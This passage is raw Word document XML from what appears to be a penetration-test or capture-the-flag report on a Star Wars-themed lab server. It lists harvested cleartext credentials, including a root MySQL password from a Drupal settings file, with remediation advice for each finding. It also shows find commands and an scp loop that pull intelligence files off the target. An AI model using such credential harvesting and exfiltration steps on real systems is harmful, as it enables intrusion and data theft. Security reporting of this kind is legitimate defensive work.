          <w:p w14:paraId="519B4825" w14:textId="459BDA77" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>daddy_issues2277</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F7CABDD" w14:textId="1F69781F" w:rsidR="003E737C" w:rsidRDefault="0091400D" w:rsidP="00CF228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">The database can be accessed with an </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Payrollapp" w:history="1">
        <w:r w:rsidRPr="0091400D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-NZ"/>
          </w:rPr>
          <w:t>SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> or with credentials found in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_/var/www/html/drupal/sites/default/" w:history="1">
        <w:r w:rsidRPr="00813087">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-NZ"/>
          </w:rPr>
          <w:t>a php settings file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31F0E4" w14:textId="12AD3C33" w:rsidR="009901DD" w:rsidRDefault="009901DD" w:rsidP="00CF228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADBEDE" w14:textId="429C3574" w:rsidR="009901DD" w:rsidRDefault="009901DD" w:rsidP="00CF228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Stop storing usernames in cleartext, use a hashing algorithm such as SHA256 or Blowfish. Force a password change on all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB48A14" w14:textId="1B8EACA4" w:rsidR="0091400D" w:rsidRDefault="0091400D" w:rsidP="003E737C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_/var/www/html/drupal/sites/default/"/>
      <w:bookmarkStart w:id="37" w:name="_Toc49875744"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidRPr="0091400D">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0091400D">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0091400D">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>/sites/default/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0091400D">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>settings.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B81CE11" w14:textId="7B55AF27" w:rsidR="0091400D" w:rsidRDefault="0091400D" w:rsidP="0091400D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>This file exposes local root</w:t>
      </w:r>
      <w:r w:rsidR="00793558">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> database credentials, allowing logins from the localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52AE52" w14:textId="2250CAC3" w:rsidR="0091400D" w:rsidRPr="0091400D" w:rsidRDefault="0091400D" w:rsidP="0091400D">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sploitme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58C31081" w14:textId="7262D0C9" w:rsidR="0091400D" w:rsidRDefault="00921957" w:rsidP="0091400D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0B331" w14:textId="5648AE64" w:rsidR="00921957" w:rsidRDefault="00921957" w:rsidP="0091400D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Use a more complex password for the database admin password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E77ACE" w14:textId="4CEBDE1B" w:rsidR="003E737C" w:rsidRDefault="003E737C" w:rsidP="003E737C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc49875745"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>boba_fett</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003E737C">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>darth_vaders_password.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="25D8F7CA" w14:textId="398558C2" w:rsidR="00CF228F" w:rsidRDefault="003E737C" w:rsidP="003E737C">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>boba_fett</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> user exposes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>darth_vader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> user password in a cleartext file in their home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CA7F7" w14:textId="2E144C7D" w:rsidR="0091400D" w:rsidRDefault="003E737C" w:rsidP="0091400D">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>darth_vader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003E737C">
        <w:t>daddy_issues-7733</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF76FF" w14:textId="4272C387" w:rsidR="00921957" w:rsidRDefault="00921957">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3E30A" w14:textId="304FFE28" w:rsidR="00921957" w:rsidRDefault="00921957">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">Have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>darth_vader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> user change their password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7117A" w14:textId="424E6683" w:rsidR="0091400D" w:rsidRDefault="0091400D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7167B" w14:textId="25860CDE" w:rsidR="0091400D" w:rsidRDefault="003B43FF" w:rsidP="003B43FF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc49875746"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exfiltrated intelligence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="22A8788B" w14:textId="354FC78E" w:rsidR="003B43FF" w:rsidRDefault="003B43FF" w:rsidP="003B43FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>The following files were recovered from the target server</w:t>
      </w:r>
      <w:r w:rsidR="00851FD1">
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9A8B6" w14:textId="68A595DB" w:rsidR="00AE5525" w:rsidRDefault="00AE5525" w:rsidP="003B43FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>The following commands were used to discover and exfiltrate intel files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7FDE5" w14:textId="64ED2F39" w:rsidR="00AE5525" w:rsidRDefault="00AE5525" w:rsidP="00AE5525">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>On the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471781F" w14:textId="3372D026" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00AE5525">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>find / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "*death*star*" -type f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C6BAAE" w14:textId="7A3997FD" w:rsidR="007619E4" w:rsidRDefault="007619E4" w:rsidP="00AE5525">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>find / -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "*rebel*alliance*" -type f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88AF89" w14:textId="4B2C7901" w:rsidR="00AE5525" w:rsidRDefault="00AE5525" w:rsidP="00AE5525">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="042AECAA" w14:textId="7EC4C8B1" w:rsidR="00AE5525" w:rsidRPr="00AE5525" w:rsidRDefault="00AE5525" w:rsidP="00AE5525">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:tab/>
        <w:t>On the attack box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C750574" w14:textId="5E543937" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00AE5525">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00851FD1">
        <w:t xml:space="preserve">for file in $(cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>exfilfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t xml:space="preserve">); do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>root@death-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>star</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00851FD1">
        <w:t>file ./exfil/ ; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023EA31" w14:textId="50259055" w:rsidR="00AE5525" w:rsidRDefault="00AE5525" w:rsidP="00AE5525">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>exfilfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the output of the 2 find command from above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1EFB06" w14:textId="5D01AFF0" w:rsidR="00051730" w:rsidRPr="00AE5525" w:rsidRDefault="00051730" w:rsidP="00AE5525">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>The following links link to the intelligence in this document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF80EB2" w14:textId="3593C870" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/darth_sidious/death-star-weak" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>darth_sidious</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/death-star-weakness.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5358D081" w14:textId="66AF6C8F" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/death_star_admin/death-star_p" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/death_star_admin/death-star_plans/deathstar-cross-section.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1143B8DC" w14:textId="6E6403EC" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/death_star_admin/death-star_p_1" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>death_star_admin</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/death-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>star_plans</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/deathstar-summary.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E179B26" w14:textId="23A09BEB" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/death_star_admin/death-star_p_2" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/death_star_admin/death-star_plans/deathstar-technical-specs-diagram.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AA7E8BC" w14:textId="0A1599F5" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/death_star_admin/death-star_p_3" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>death_star_admin</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/death-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>star_plans</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/deathstar-operations.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36982560" w14:textId="064A781E" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/death_star_admin/death-star_p_4" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>death_star_admin</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/death-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>star_plans</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/deathstar-crafts.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05DEACBE" w14:textId="6BA6F4A0" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/darth_vader/i-love-my-death-s" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>darth_vader</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/i-love-my-death-star.jpg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A95B8D5" w14:textId="2B127C0D" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/opt/proftpd/share/locale/deathstar" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/opt/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>proftpd</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/share/locale/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>deathstarinfographic.pNg</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CE0ABFA" w14:textId="47F8FD1F" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/general_veers/rebel-informati" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>general_veers</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/rebel-information/rebel-alliance-fleet-1.jpg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="626C4B30" w14:textId="6DB5DEEE" w:rsidR="00B7499F" w:rsidRDefault="00F6289A" w:rsidP="00B7499F">
      <w:hyperlink w:anchor="_/home/general_veers/rebel-informati_1" w:history="1">
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/home/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>general_veers</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00B7499F" w:rsidRPr="00E011D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/rebel-information/rebel-alliance-fleet-2.jpg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B07401C" w14:textId="655E017F" w:rsidR="007619E4" w:rsidRDefault="007619E4" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A1FCB" w14:textId="2860F798" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_/home/darth_sidious/death-star-weak"/>
      <w:bookmarkStart w:id="41" w:name="_Toc49875747"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>darth_sidious</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/death-star-weakness.png</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="3DB1FA9E" w14:textId="30DE9281" w:rsidR="00851FD1" w:rsidRPr="00851FD1" w:rsidRDefault="007619E4" w:rsidP="00851FD1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79502148" wp14:editId="11DB9B39">
            <wp:extent cx="5175250" cy="6400800"/>
            <wp:effectExtent l="0" t="0" r="635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5250" cy="640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C38CC" w14:textId="0BD7E288" w:rsidR="007619E4" w:rsidRDefault="007619E4" w:rsidP="00851FD1">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542831E" w14:textId="34714CCE" w:rsidR="00851FD1" w:rsidRDefault="00851FD1" w:rsidP="00864DF2">
      <w:pPr>
